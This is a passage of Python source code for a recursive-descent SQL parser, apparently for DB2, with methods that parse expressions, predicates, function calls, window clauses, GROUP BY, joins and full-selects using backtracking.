scale = None
else:
self._forget_state()
return (typeschema, typename, size, scale)
def _parse_ident_list(self, newlines=False):
"""Parses a comma separated list of identifiers.
This is a common pattern in SQL, for example within parentheses on the
left hand side of an assignment in an UPDATE statement, or the INCLUDE
list of a CREATE UNIQUE INDEX statement.
The method returns a list of the identifiers seen (primarily useful for
counting the number of identifiers seen, but has other uses too).
"""
result = []
while True:
ident = self._expect(TT.IDENTIFIER).value
# Parse an optional array element suffix
if self._match('[', prespace=False):
self._parse_expression()
self._expect(']')
result.append(ident)
if not self._match(','):
break
elif newlines:
self._newline()
return result
def _parse_expression_list(self, allowdefault=False, newlines=False):
"""Parses a comma separated list of expressions.
This is a common pattern in SQL, for example the parameter list of
a function, the arguments of an ORDER BY clause, etc. The allowdefault
parameter indicates whether DEFAULT can appear in the list instead
of an expression (useful when parsing the VALUES clause of an INSERT
statement for example).
"""
while True:
if not (allowdefault and self._match('DEFAULT')):
self._parse_expression()
if not self._match(','):
break
elif newlines:
self._newline()
def _parse_datatype_list(self, newlines=False):
"""Parses a comma separated list of data-types.
This is another common pattern in SQL, found when trying to define
the prototype of a function or procedure without using the specific
name (and a few other places).
"""
while True:
self._parse_datatype()
if not self._match(','):
break
elif newlines:
self._newline()
def _parse_ident_type_list(self, newlines=False):
"""Parses a comma separated list of identifiers and data-types.
This is a common pattern in SQL, found in the prototype of SQL
functions, the INCLUDE portion of a SELECT-FROM-DML statement, etc.
"""
while True:
self._expect(TT.IDENTIFIER)
self._parse_datatype()
if not self._match(','):
break
elif newlines:
self._newline()
def _parse_tuple(self, allowdefault=False):
"""Parses a full-select or a tuple (list) of expressions.
This is a common pattern found in SQL, for example on the right hand
side of the IN operator, in an UPDATE statement on the right hand side
of a parenthesized column list, etc. The easiest way to implement
this is by saving the current parser state, attempting to parse a
full-select, rewinding the state if this fails and parsing a tuple
of expressions.
        The allowdefault parameter is propagated to parse_expression_list. See
parse_expression_list for more detail.
"""
# Opening parenthesis already matched
if self._peek_one_of(['SELECT', 'VALUES']):
# Parse a full-select
self._indent()
self._parse_full_select()
self._outdent()
else:
# Everything else (including a redundantly parenthesized
# full-select) can be parsed as an expression list
self._parse_expression_list(allowdefault)
# EXPRESSIONS and PREDICATES #############################################
def _parse_search_condition(self, newlines=True):
"""Parse a search condition (as part of WHERE/HAVING/etc.)"""
while True:
self._match('NOT')
            # Ambiguity: open parentheses could indicate a parenthesized search
# condition, or a parenthesized expression within a predicate
self._save_state()
try:
# Attempt to parse a parenthesized search condition
self._expect('(')
self._parse_search_condition(newlines)
self._expect(')')
except ParseError:
# If that fails, rewind and parse a predicate instead (which
# will parse a parenthesized expression)
self._restore_state()
self._parse_predicate()
if self._match('SELECTIVITY'):
self._expect(TT.NUMBER)
else:
self._forget_state()
if self._match_one_of(['AND', 'OR']):
if newlines:
self._newline(-1)
else:
break
def _parse_predicate(self):
"""Parse high precedence predicate operators (BETWEEN, IN, etc.)"""
if self._match('EXISTS'):
self._expect('(')
self._parse_full_select()
self._expect(')')
else:
self._parse_expression()
if self._match('NOT'):
if self._match('LIKE'):
self._parse_expression()
if self._match('ESCAPE'):
self._parse_expression()
elif self._match('BETWEEN'):
self._parse_expression()
self._expect('AND')
self._parse_expression()
elif self._match('IN'):
if self._match('('):
self._parse_tuple()
self._expect(')')
else:
self._parse_expression()
else:
self._expected_one_of(['LIKE', 'BETWEEN', 'IN'])
elif self._match('LIKE'):
self._parse_expression()
if self._match('ESCAPE'):
self._parse_expression()
elif self._match('BETWEEN'):
self._parse_expression()
self._expect('AND')
self._parse_expression()
elif self._match('IN'):
if self._match('('):
self._parse_tuple()
self._expect(')')
else:
self._parse_expression()
elif self._match('IS'):
self._match('NOT')
if self._match('VALIDATED'):
if self._match('ACCORDING'):
self._expect_sequence(['TO', 'XMLSCHEMA'])
if self._match('IN'):
self._expect('(')
while True:
self._parse_xml_schema_identification()
if not self._match(','):
break
self._expect(')')
else:
self._parse_xml_schema_identification()
else:
self._expect_one_of(['NULL', 'VALIDATED'])
elif self._match('XMLEXISTS'):
self._expect('(')
self._expect(TT.STRING)
if self._match('PASSING'):
self._match_sequence(['BY', 'REF'])
while True:
self._parse_expression()
self._expect_sequence(['AS', TT.IDENTIFIER])
self._match_sequence(['BY', 'REF'])
if not self._match(','):
break
self._expect(')')
elif self._match_one_of(['=', '<', '>', '<>', '<=', '>=']):
if self._match_one_of(['SOME', 'ANY', 'ALL']):
self._expect('(')
self._parse_full_select()
self._expect(')')
else:
self._parse_expression()
else:
self._expected_one_of([
'EXISTS',
'NOT',
'LIKE',
'BETWEEN',
'IS',
'IN',
'=',
'<',
'>',
'<>',
'<=',
'>='
])
def _parse_duration_label(self, optional=False):
labels = (
'YEARS',
'YEAR',
'DAYS',
'DAY',
'MONTHS',
'MONTH',
'HOURS',
'HOUR',
'MINUTES',
'MINUTE',
'SECONDS',
'SECOND',
'MICROSECONDS',
'MICROSECOND',
)
if optional:
self._match_one_of(labels)
else:
self._expect_one_of(labels)
def _parse_expression(self):
while True:
self._match_one_of(['+', '-'], postspace=False) # Unary +/-
if self._match('('):
self._parse_tuple()
self._expect(')')
elif self._match('CAST'):
self._parse_cast_expression()
elif self._match('XMLCAST'):
self._parse_cast_expression()
elif self._match('CASE'):
if self._match('WHEN'):
self._parse_searched_case()
else:
self._parse_simple_case()
elif self._match_sequence(['NEXT', 'VALUE', 'FOR']) or self._match_sequence(['NEXTVAL', 'FOR']):
self._parse_sequence_name()
elif self._match_sequence(['PREVIOUS', 'VALUE', 'FOR']) or self._match_sequence(['PREVVAL', 'FOR']):
self._parse_sequence_name()
elif self._match_sequence(['ROW', 'CHANGE']):
self._expect_one_of(['TOKEN', 'TIMESTAMP'])
self._expect('FOR')
self._parse_table_name()
elif self._match_one_of([TT.NUMBER, TT.STRING, TT.PARAMETER, 'NULL']): # Literals
pass
else:
# Ambiguity: an identifier could be a register, a function
# call, a column name, etc.
self._save_state()
try:
self._parse_function_call()
except ParseError:
self._restore_state()
self._save_state()
try:
self._parse_special_register()
except ParseError:
self._restore_state()
self._parse_column_name()
else:
self._forget_state()
else:
self._forget_state()
# Parse an optional array element suffix
if self._match('[', prespace=False):
self._parse_expression()
self._expect(']')
# Parse an optional interval suffix
self._parse_duration_label(optional=True)
if not self._match_one_of(['+', '-', '*', '/', '||', 'CONCAT']): # Binary operators
break
def _parse_function_call(self):
"""Parses a function call of various types"""
# Ambiguity: certain functions have "abnormal" internal syntaxes (extra
# keywords, etc). The _parse_scalar_function_call method is used to
# handle all "normal" syntaxes. Special methods are tried first for
# everything else
self._save_state()
try:
self._parse_aggregate_function_call()
except ParseError:
self._restore_state()
self._save_state()
try:
self._parse_olap_function_call()
except ParseError:
self._restore_state()
self._save_state()
try:
self._parse_xml_function_call()
except ParseError:
self._restore_state()
self._save_state()
try:
self._parse_sql_function_call()
except ParseError:
self._restore_state()
self._parse_scalar_function_call()
else:
self._forget_state()
else:
self._forget_state()
else:
self._forget_state()
else:
self._forget_state()
def _parse_aggregate_function_call(self):
"""Parses an aggregate function with it's optional arg-prefix"""
# Parse the optional SYSIBM schema prefix
if self._match('SYSIBM'):
self._expect('.')
# Although CORRELATION and GROUPING are aggregate functions they're not
# included here as their syntax is entirely compatible with "ordinary"
# functions so _parse_scalar_function_call will handle them
aggfunc = self._expect_one_of([
'ARRAY_AGG',
'COUNT',
'COUNT_BIG',
'AVG',
'MAX',
'MIN',
'STDDEV',
'SUM',
'VARIANCE',
'VAR',
]).value
self._expect('(', prespace=False)
if aggfunc in ('COUNT', 'COUNT_BIG') and self._match('*'):
# COUNT and COUNT_BIG can take '*' as a sole parameter
pass
elif aggfunc == 'ARRAY_AGG':
self._parse_expression()
if self._match_sequence(['ORDER', 'BY']):
while True:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
else:
# The aggregation functions handled by this method have an optional
# ALL/DISTINCT argument prefix
self._match_one_of(['ALL', 'DISTINCT'])
# And only take a single expression as an argument
self._parse_expression()
self._expect(')')
# Parse an OLAP suffix if one exists
if self._match('OVER'):
self._parse_olap_window_clause()
def _parse_olap_function_call(self):
"""Parses an OLAP function call (some of which have non-standard internal syntax)"""
if self._match('SYSIBM'):
self._expect('.')
olapfunc = self._expect_one_of([
'ROW_NUMBER',
'RANK',
'DENSE_RANK',
'LAG',
'LEAD',
'FIRST_VALUE',
'LAST_VALUE',
]).value
self._expect('(', prespace=False)
if olapfunc in ('LAG', 'LEAD'):
self._parse_expression()
if self._match(','):
self._expect(TT.NUMBER)
                if self._match(','):
self._parse_expression()
if self._match(','):
self._expect_one_of([(TT.STRING, 'RESPECT NULLS'), (TT.STRING, 'IGNORE NULLS')])
elif olapfunc in ('FIRST_VALUE', 'LAST_VALUE'):
self._parse_expression()
if self._match(','):
self._expect_one_of([(TT.STRING, 'RESPECT NULLS'), (TT.STRING, 'IGNORE NULLS')])
self._expect(')')
self._expect('OVER')
self._parse_olap_window_clause()
def _parse_xml_function_call(self):
"""Parses an XML function call (which has non-standard internal syntax)"""
# Parse the optional SYSIBM schema prefix
if self._match('SYSIBM'):
self._expect('.')
# Note that XML2CLOB (compatibility), XMLCOMMENT, XMLCONCAT,
# XMLDOCUMENT, XMLTEXT, and XMLXSROBJECTID aren't handled by this
# method as their syntax is "normal" so _parse_scalar_function_call
# will handle them
xmlfunc = self._expect_one_of([
'XMLAGG',
'XMLATTRIBUTES',
'XMLELEMENT',
'XMLFOREST',
'XMLGROUP',
'XMLNAMESPACES',
'XMLPARSE',
'XMLPI',
'XMLQUERY',
'XMLROW',
'XMLSERIALIZE',
'XMLVALIDATE',
'XMLTABLE',
'XMLTRANSFORM',
]).value
self._expect('(', prespace=False)
if xmlfunc == 'XMLAGG':
self._parse_expression()
if self._match_sequence(['ORDER', 'BY']):
while True:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
elif xmlfunc == 'XMLATTRIBUTES':
while True:
self._parse_expression()
if self._match('AS'):
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
elif xmlfunc == 'XMLELEMENT':
self._expect('NAME')
self._expect(TT.IDENTIFIER)
if self._match(','):
# XXX We're not specifically checking for namespaces and
# attributes calls as we should here (although expression_list
# will parse them just fine)
self._parse_expression_list()
if self._match('OPTION'):
self._parse_xml_value_option()
elif xmlfunc == 'XMLFOREST':
while True:
# XXX We're not specifically checking for a namespaces call as
# we should here (although expression will parse it just fine)
self._parse_expression()
self._match_sequence(['AS', TT.IDENTIFIER])
if not self._match(','):
break
if self._match('OPTION'):
self._parse_xml_value_option()
elif xmlfunc == 'XMLGROUP':
while True:
self._parse_expression()
if self._match('AS'):
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
if self._match_sequence(['ORDER', 'BY']):
while True:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
if self._match('OPTION'):
self._parse_xml_row_option(allowroot=True)
elif xmlfunc == 'XMLNAMESPACES':
while True:
if self._match('DEFAULT'):
self._expect(TT.STRING)
elif self._match('NO'):
self._expect_sequence(['DEFAULT', TT.STRING])
else:
self._expect_sequence([TT.STRING, 'AS', TT.IDENTIFIER])
if not self._match(','):
break
elif xmlfunc == 'XMLPARSE':
self._expect_sequence(['DOCUMENT', TT.STRING])
if self._match_one_of(['STRIP', 'PRESERVE']):
self._expect('WHITESPACE')
elif xmlfunc == 'XMLPI':
self._expect_sequence(['NAME', TT.IDENTIFIER])
if self._match(','):
self._expect(TT.STRING)
elif xmlfunc == 'XMLQUERY':
self._expect(TT.STRING)
if self._match('PASSING'):
self._match_sequence(['BY', 'REF'])
while True:
self._parse_expression()
self._expect_sequence(['AS', TT.IDENTIFIER])
self._match_sequence(['BY', 'REF'])
if not self._match(','):
break
if self._match('RETURNING'):
self._expect('SEQUENCE')
self._match_sequence(['BY', 'REF'])
self._match_sequence(['EMPTY', 'ON', 'EMPTY'])
elif xmlfunc == 'XMLROW':
while True:
self._parse_expression()
self._match_sequence(['AS', TT.IDENTIFIER])
if not self._match(','):
break
if self._match('OPTION'):
self._parse_xml_row_option(allowroot=False)
elif xmlfunc == 'XMLSERIALIZE':
self._match('CONTENT')
self._parse_expression()
self._expect('AS')
# XXX Data type can only be CHAR/VARCHAR/CLOB
self._parse_datatype()
valid = set(['VERSION', 'INCLUDING', 'EXCLUDING'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'VERSION':
self._expect(TT.STRING)
elif t == 'INCLUDING':
valid.remove('EXCLUDING')
self._expect('XMLDECLARATION')
elif t == 'EXCLUDING':
valid.remove('INCLUDING')
self._expect('XMLDECLARATION')
elif xmlfunc == 'XMLVALIDATE':
self._match('DOCUMENT')
self._parse_expression()
if self._match('ACCORDING'):
self._expect_sequence(['TO', 'XMLSCHEMA'])
self._parse_xml_schema_identification()
if self._match('NAMESPACE'):
self._expect(TT.STRING)
elif self._match('NO'):
self._expect('NAMESPACE')
self._match_sequence(['ELEMENT', TT.IDENTIFIER])
elif xmlfunc == 'XMLTABLE':
self._parse_expression()
if self._match(','):
self._expect(TT.STRING)
if self._match('PASSING'):
self._match_sequence(['BY', 'REF'])
while True:
self._parse_expression()
self._expect_sequence(['AS', TT.IDENTIFIER])
self._match_sequence(['BY', 'REF'])
if not self._match(','):
break
if self._match('COLUMNS'):
while True:
self._expect(TT.IDENTIFIER)
if not self._match_sequence(['FOR', 'ORDINALITY']):
self._parse_datatype()
self._match_sequence(['BY', 'REF'])
if self._match('DEFAULT'):
self._parse_expression()
if self._match('PATH'):
self._expect(TT.STRING)
if not self._match(','):
break
elif xmlfunc == 'XMLTRANSFORM':
self._parse_expression()
self._expect('USING')
self._parse_expression()
if self._match('WITH'):
self._parse_expression()
if self._match('AS'):
self._parse_datatype()
self._expect(')')
def _parse_xml_schema_identification(self):
"""Parses an identifier for an XML schema"""
# ACCORDING TO XMLSCHEMA already matched
if self._match('ID'):
self._parse_subschema_name()
else:
if self._match('URI'):
self._expect(TT.STRING)
elif self._match('NO'):
self._expect('NAMESPACE')
else:
self._expected_one_of(['ID', 'URI', 'NO'])
self._match_sequence(['LOCATION', TT.STRING])
def _parse_xml_row_option(self, allowroot=False):
"""Parses an XML OPTION suffix for rows in certain XML function calls"""
# OPTION already matched
valid = set(['ROW', 'AS'])
if allowroot:
valid.add('ROOT')
while valid:
            # Each option is optional, so match rather than expect (with
            # expect, a single option would demand that the others follow it)
            t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t in ('ROW', 'ROOT'):
self._expect(TT.IDENTIFIER)
elif t == 'AS':
self._expect('ATTRIBUTES')
def _parse_xml_value_option(self):
"""Parses an XML OPTION suffix for scalar values in certain XML function calls"""
# OPTION already matched
valid = set(['EMPTY', 'NULL', 'XMLBINARY'])
while valid:
            # Each option is optional, so match rather than expect (with
            # expect, a single option would demand that the others follow it)
            t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'EMPTY':
valid.remove('NULL')
self._expect_sequence(['ON', 'NULL'])
elif t == 'NULL':
valid.remove('EMPTY')
self._expect_sequence(['ON', 'NULL'])
elif t == 'XMLBINARY':
self._match('USING')
self._expect_one_of(['BASE64', 'HEX'])
def _parse_sql_function_call(self):
"""Parses scalar function calls with abnormal internal syntax (usually as dictated by the SQL standard)"""
# Parse the optional SYSIBM schema prefix
if self._match('SYSIBM'):
self._expect('.')
# Note that only the "special" syntax of functions is handled here.
# Most of these functions will also accept "normal" syntax. In that
# case, this method will raise a parse error and the caller will
# backtrack to handle the function as normal with
# _parse_scalar_function_call
sqlfunc = self._expect_one_of([
'CHAR_LENGTH',
'CHARACTER_LENGTH',
'OVERLAY',
'POSITION',
'SUBSTRING',
'TRIM',
]).value
self._expect('(', prespace=False)
if sqlfunc in ('CHAR_LENGTH', 'CHARACTER_LENGTH'):
self._parse_expression()
if self._match('USING'):
self._expect_one_of(['CODEUNITS16', 'CODEUNITS32', 'OCTETS'])
elif sqlfunc == 'OVERLAY':
self._parse_expression()
self._expect('PLACING')
self._parse_expression()
self._expect('FROM')
self._parse_expression()
if self._match('FOR'):
self._parse_expression()
self._expect('USING')
self._expect_one_of(['CODEUNITS16', 'CODEUNITS32', 'OCTETS'])
elif sqlfunc == 'POSITION':
self._parse_expression()
self._expect('IN')
self._parse_expression()
self._expect('USING')
self._expect_one_of(['CODEUNITS16', 'CODEUNITS32', 'OCTETS'])
elif sqlfunc == 'SUBSTRING':
self._parse_expression()
self._expect('FROM')
self._parse_expression()
if self._match('FOR'):
self._parse_expression()
self._expect('USING')
self._expect_one_of(['CODEUNITS16', 'CODEUNITS32', 'OCTETS'])
elif sqlfunc == 'TRIM':
if self._match_one_of(['BOTH', 'B', 'LEADING', 'L', 'TRAILING', 'T']):
self._match(TT.STRING)
self._expect('FROM')
self._parse_expression()
self._expect(')')
def _parse_scalar_function_call(self):
"""Parses a scalar function call with all its arguments"""
self._parse_function_name()
self._expect('(', prespace=False)
if not self._match(')'):
self._parse_expression_list()
self._expect(')')
def _parse_olap_range(self, optional):
"""Parses a ROWS or RANGE specification in an OLAP-function call"""
# [ROWS|RANGE] already matched
if self._match('CURRENT'):
self._expect('ROW')
elif self._match_one_of(['UNBOUNDED', TT.NUMBER]):
self._expect_one_of(['PRECEDING', 'FOLLOWING'])
elif not optional:
self._expected_one_of(['CURRENT', 'UNBOUNDED', TT.NUMBER])
else:
return False
return True
def _parse_olap_window_clause(self):
"""Parses the aggregation suffix in an OLAP-function call"""
# OVER already matched
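        # For example (illustrative input only):
        #   (PARTITION BY C1 ORDER BY C2 ROWS BETWEEN 1 PRECEDING AND CURRENT ROW)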
self._expect('(')
if not self._match(')'):
self._indent()
if self._match('PARTITION'):
self._expect('BY')
self._parse_expression_list()
if self._match('ORDER'):
self._newline(-1)
self._expect('BY')
while True:
if self._match('ORDER'):
self._expect('OF')
self._parse_table_name()
else:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if self._match('NULLS'):
self._expect_one_of(['FIRST', 'LAST'])
if not self._match(','):
break
if self._match_one_of(['ROWS', 'RANGE']):
if not self._parse_olap_range(True):
self._expect('BETWEEN')
self._parse_olap_range(False)
self._expect('AND')
self._parse_olap_range(False)
self._outdent()
self._expect(')')
def _parse_cast_expression(self):
"""Parses a CAST() expression"""
# CAST already matched
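        # For example (illustrative): CAST(C1 AS VARCHAR(10))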
self._expect('(', prespace=False)
self._parse_expression()
self._expect('AS')
self._parse_datatype()
if self._match('SCOPE'):
self._parse_relation_name()
self._expect(')')
def _parse_searched_case(self):
"""Parses a searched CASE expression (CASE WHEN expression...)"""
# CASE WHEN already matched
# Parse all WHEN cases
self._indent(-1)
while True:
self._parse_search_condition(newlines=False) # WHEN Search condition
self._expect('THEN')
self._parse_expression() # THEN Expression
if self._match('WHEN'):
self._newline(-1)
elif self._match('ELSE'):
self._newline(-1)
break
elif self._match('END'):
self._outdent(-1)
return
else:
self._expected_one_of(['WHEN', 'ELSE', 'END'])
# Parse the optional ELSE case
self._parse_expression() # ELSE Expression
self._outdent()
self._expect('END')
def _parse_simple_case(self):
"""Parses a simple CASE expression (CASE expression WHEN value...)"""
# CASE already matched
# Parse the CASE Expression
self._parse_expression() # CASE Expression
# Parse all WHEN cases
self._indent()
self._expect('WHEN')
while True:
self._parse_expression() # WHEN Expression
self._expect('THEN')
self._parse_expression() # THEN Expression
if self._match('WHEN'):
self._newline(-1)
elif self._match('ELSE'):
self._newline(-1)
break
elif self._match('END'):
self._outdent(-1)
return
else:
self._expected_one_of(['WHEN', 'ELSE', 'END'])
# Parse the optional ELSE case
self._parse_expression() # ELSE Expression
self._outdent()
self._expect('END')
def _parse_column_expression(self):
"""Parses an expression representing a column in a SELECT expression"""
if not self._match_sequence([TT.IDENTIFIER, '.', '*']):
self._parse_expression()
# Parse optional column alias
if self._match('AS'):
self._expect(TT.IDENTIFIER)
# Ambiguity: FROM and INTO can legitimately appear in this
# position as a KEYWORD (which the IDENTIFIER match below would
# accept)
elif not self._peek_one_of(['FROM', 'INTO']):
self._match(TT.IDENTIFIER)
def _parse_grouping_expression(self):
"""Parses a grouping-expression in a GROUP BY clause"""
if not self._match_sequence(['(', ')']):
self._parse_expression()
def _parse_super_group(self):
"""Parses a super-group in a GROUP BY clause"""
# [ROLLUP|CUBE] already matched
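        # For example (illustrative): ROLLUP (C1, (C2, C3))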
self._expect('(')
self._indent()
while True:
if self._match('('):
self._parse_expression_list()
self._expect(')')
else:
self._parse_expression()
if not self._match(','):
break
else:
self._newline()
self._outdent()
self._expect(')')
def _parse_grouping_sets(self):
"""Parses a GROUPING SETS expression in a GROUP BY clause"""
# GROUPING SETS already matched
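        # For example (illustrative): GROUPING SETS ((C1, C2), ROLLUP (C3))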
self._expect('(')
self._indent()
while True:
if self._match('('):
while True:
if self._match_one_of(['ROLLUP', 'CUBE']):
self._parse_super_group()
else:
self._parse_grouping_expression()
if not self._match(','):
break
self._expect(')')
elif self._match_one_of(['ROLLUP', 'CUBE']):
self._parse_super_group()
else:
self._parse_grouping_expression()
if not self._match(','):
break
else:
self._newline()
self._outdent()
self._expect(')')
def _parse_group_by(self):
"""Parses the grouping-expression-list of a GROUP BY clause"""
# GROUP BY already matched
alt_syntax = True
while True:
if self._match('GROUPING'):
self._expect('SETS')
self._parse_grouping_sets()
alt_syntax = False
elif self._match_one_of(['ROLLUP', 'CUBE']):
self._parse_super_group()
alt_syntax = False
else:
self._parse_grouping_expression()
if not self._match(','):
break
else:
self._newline()
# Ambiguity: the WITH used in the alternate syntax for super-groups
# can be mistaken for the WITH defining isolation level at the end
# of a query. Hence we must use a sequence match here...
if alt_syntax:
if not self._match_sequence(['WITH', 'ROLLUP']):
self._match_sequence(['WITH', 'CUBE'])
def _parse_sub_select(self, allowinto=False):
"""Parses a sub-select expression"""
# SELECT already matched
self._match_one_of(['ALL', 'DISTINCT'])
if not self._match('*'):
self._indent()
while True:
self._parse_column_expression()
if not self._match(','):
break
else:
self._newline()
self._outdent()
if allowinto and self._match('INTO'):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect('FROM')
self._indent()
while True:
self._parse_join_expression()
if not self._match(','):
break
else:
self._newline()
self._outdent()
if self._match('WHERE'):
self._indent()
self._parse_search_condition()
self._outdent()
if self._match_sequence(['GROUP', 'BY']):
self._indent()
self._parse_group_by()
self._outdent()
if self._match('HAVING'):
self._indent()
self._parse_search_condition()
self._outdent()
if self._match_sequence(['ORDER', 'BY']):
self._indent()
while True:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
else:
self._newline()
self._outdent()
if self._match_sequence(['FETCH', 'FIRST']):
self._match(TT.NUMBER) # Row count is optional (defaults to 1)
self._expect_one_of(['ROW', 'ROWS'])
self._expect('ONLY')
def _parse_table_correlation(self, optional=True):
"""Parses a table correlation clause (with optional column alias list)"""
if optional:
# An optional table correlation is almost always ambiguous given
# that it can start with just about any identifier (the AS is
# always optional)
self._save_state()
try:
# Call ourselves recursively to try and parse the correlation
self._parse_table_correlation(False)
except ParseError:
# If it fails, rewind and return
self._restore_state()
else:
self._forget_state()
else:
if self._match('AS'):
self._expect(TT.IDENTIFIER)
# Ambiguity: Several KEYWORDs can legitimately appear in this
# position. XXX This is horrible - there /must/ be a cleaner way of
# doing this with states and backtracking
elif not self._peek_one_of([
'DO',
'EXCEPT',
'MINUS',
'FETCH',
'GROUP',
'HAVING',
'CROSS',
'LEFT',
'RIGHT',
'FULL',
'INNER',
'JOIN',
'NATURAL',
'INTERSECT',
'ON',
'ORDER',
'SET',
'TABLESAMPLE',
'UNION',
'USING',
'WHERE',
'WITH',
]):
self._expect(TT.IDENTIFIER)
# Parse optional column aliases
if self._match('('):
self._parse_ident_list()
self._expect(')')
def _parse_values_expression(self, allowdefault=False, allowinto=False):
"""Parses a VALUES expression"""
# VALUES already matched
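        # For example (illustrative): VALUES (1, 'a'), (2, 'b')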
self._indent()
while True:
if self._match('('):
self._parse_expression_list(allowdefault)
self._expect(')')
else:
if not (allowdefault and self._match('DEFAULT')):
self._parse_expression()
if self._match(','):
self._newline()
else:
break
self._outdent()
if allowinto and self._match('INTO'):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
def _parse_join_expression(self):
"""Parses join operators in a table-reference"""
self._parse_table_ref()
while True:
if self._match('CROSS'):
self._newline(-1)
self._expect('JOIN')
self._parse_table_ref()
elif self._match('INNER'):
self._newline(-1)
self._expect('JOIN')
self._parse_table_ref()
self._parse_join_condition()
elif self._match_one_of(['LEFT', 'RIGHT', 'FULL']):
self._newline(-1)
self._match('OUTER')
self._expect('JOIN')
self._parse_table_ref()
self._parse_join_condition()
elif self._match('JOIN'):
self._newline(-1)
self._parse_table_ref()
self._parse_join_condition()
else:
break
def _parse_lateral_options(self):
"""Parses the RETURN DATA UNTIL options of a LATERAL/TABLE reference"""
if self._match_sequence(['RETURN', 'DATA', 'UNTIL']):
while True:
self._expect_sequence(['FEDERATED', 'SQLSTATE'])
self._match('VALUE')
self._expect(TT.STRING)
if self._match('SQLCODE'):
while True:
self._expect(TT.NUMBER)
if not self._match(','):
break
if not self._match(','):
break
return True
else:
return False
def _parse_table_ref(self):
"""Parses literal table references or functions in a table-reference"""
# Ambiguity: A table or schema can be named TABLE, FINAL, OLD, etc.
reraise = False
self._save_state()
try:
if self._match('('):
# Ambiguity: Open-parenthesis could indicate a full-select or a
# join expression
self._save_state()
try:
# Try and parse a full-select
self._parse_full_select()
reraise = True
self._expect(')')
self._parse_table_correlation(optional=True)
except ParseError:
# If it fails, rewind and try a join expression instead
self._restore_state()
if reraise: raise
self._parse_join_expression()
self._expect(')')
else:
self._forget_state()
elif self._match('LATERAL'):
self._parse_lateral_options()
self._expect('(', prespace=False)
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
self._parse_table_correlation(optional=True)
elif self._match('TABLE'):
lateral = self._parse_lateral_options()
self._expect('(', prespace=False)
# Ambiguity: TABLE() can indicate a table-function call or a
# nested table expression
self._save_state()
try:
# Try and parse a full-select
self._indent()
self._parse_full_select()
self._outdent()
except ParseError:
# If it fails, rewind and try a function call instead
self._restore_state()
if lateral: raise
self._parse_function_call()
else:
self._forget_state()
reraise = True
self._expect(')')
self._parse_table_correlation(optional=True)
elif self._match_one_of(['FINAL', 'NEW']):
self._expect('TABLE')
self._expect('(', prespace=False)
self._indent()
if self._expect_one_of(['INSERT', 'UPDATE']).value == 'INSERT':
self._parse_insert_statement()
else:
self._parse_update_statement()
reraise = True
self._outdent()
self._expect(')')
self._parse_table_correlation(optional=True)
elif self._match('OLD'):
self._expect('TABLE')
self._expect('(', prespace=False)
self._indent()
if self._expect_one_of(['UPDATE', 'DELETE']).value == 'DELETE':
self._parse_delete_statement()
else:
self._parse_update_statement()
reraise = True
self._outdent()
self._expect(')')
self._parse_table_correlation(optional=True)
elif self._match('UNNEST'):
self._expect('(', prespace=False)
self._indent()
while True:
if self._match('CAST'):
self._parse_cast_expression()
else:
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
self._outdent()
self._expect(')')
self._parse_table_correlation(optional=False)
elif self._peek('XMLTABLE'):
# Bizarrely, the XMLTABLE table function can be used outside a
# TABLE() reference...
self._parse_xml_function_call()
else:
raise ParseBacktrack()
except ParseError:
# If the above fails, rewind and try a simple table reference
self._restore_state()
if reraise: raise
self._parse_table_name()
self._parse_table_correlation(optional=True)
if self._match('TABLESAMPLE'):
self._expect_one_of(['BERNOULLI', 'SYSTEM'])
self._expect('(')
self._parse_expression()
self._expect(')')
if self._match('REPEATABLE'):
self._expect('(')
self._parse_expression()
self._expect(')')
else:
self._forget_state()
def _parse_join_condition(self):
"""Parses the condition on an SQL-92 style join"""
        # This method can be extended to support USING(ident-list) if this
        # is ever added to DB2 (see PostgreSQL)
self._indent()
self._expect('ON')
self._parse_search_condition()
self._outdent()
def _parse_full_select(self, allowdefault=False, allowinto=False):
"""Parses set operators (low precedence) in a full-select expression"""
self._parse_relation(allowdefault, allowinto)
while True:
if self._match_one_of(['UNION', 'INTERSECT', 'EXCEPT', 'MINUS']):
self._newline(-1)
self._newline(-1, allowempty=True)
self._match('ALL')
self._newline()
self._newline(allowempty=True)
# No need to include allowinto here (it's only permitted in a
# top-level subselect)
self._parse_relation(allowdefault)
else:
break
if self._match('ORDER'):
self._expect('BY')
while True:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
if self._match('FETCH'):
self._expect('FIRST')
self._match(TT.NUMBER) # Row count is optional (defaults to 1)
self._expect_one_of(['ROW', 'ROWS'])
self._expect('ONLY')
def _parse_relation(self, allowdefault=False, allowinto=False):
"""Parses relation generators (high precedence) in a full-select expression"""
# XXX Add support for the TABLE statement from the SQL standard
if self._match('('):
self._indent()
# No need to include allowinto here (it's only permitted in a
# top-level subselect)
self._parse_full_select(allowdefault)
self._outdent()
self._expect(')')
elif self._match('SELECT'):
self._parse_sub_select(allowinto)
elif self._match('VALUES'):
self._parse_values_expression(allowdefault, allowinto)
else:
self._expected_one_of(['SELECT', 'VALUES', '('])
def _parse_query(self, allowdefault=False, allowinto=False):
"""Parses a full-select with optional common-table-expression"""
# Parse the optional common-table-expression
if self._match('WITH'):
while True:
self._expect(TT.IDENTIFIER)
# Parse the optional column-alias list
if self._match('('):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect(')')
self._expect('AS')
self._expect('(')
self._indent()
# No need to include allowdefault or allowinto here. Neither
# are ever permitted in a CTE
self._parse_full_select()
self._outdent()
self._expect(')')
if not self._match(','):
break
else:
self._newline()
self._newline()
# Parse the actual full-select. DEFAULT may be permitted here if the
# full-select turns out to be a VALUES statement
self._parse_full_select(allowdefault, allowinto)
# CLAUSES ################################################################
